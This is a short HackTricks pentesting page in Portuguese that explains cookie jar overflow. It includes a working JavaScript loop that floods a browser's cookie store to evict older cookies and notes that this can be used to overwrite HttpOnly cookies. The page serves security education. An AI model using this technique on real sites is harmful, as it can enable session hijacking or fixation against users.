{{#include ../../banners/hacktricks-training.md}}

Os navegadores têm um **limite no número de cookies** que podem armazenar para uma página. Então, se por algum motivo você precisar **fazer um cookie desaparecer**, você pode **transbordar o jarro de cookies** já que os mais antigos serão excluídos antes:
```javascript
// Set many cookies
for (let i = 0; i < 700; i++) {
document.cookie = `cookie${i}=${i}; Secure`
}

// Remove all cookies
for (let i = 0; i < 700; i++) {
document.cookie = `cookie${i}=${i};expires=Thu, 01 Jan 1970 00:00:01 GMT`
}
```
Observe que cookies de terceiros apontando para um domínio diferente não serão sobrescritos.

> [!CAUTION]
> Este ataque também pode ser usado para **sobrescrever cookies HttpOnly, pois você pode excluí-los e, em seguida, redefini-los com o valor que deseja**.
>
> Verifique isso em [**este post com um laboratório**](https://www.sjoerdlangkemper.nl/2020/05/27/overwriting-httponly-cookies-from-javascript-using-cookie-jar-overflow/).

{{#include ../../banners/hacktricks-training.md}}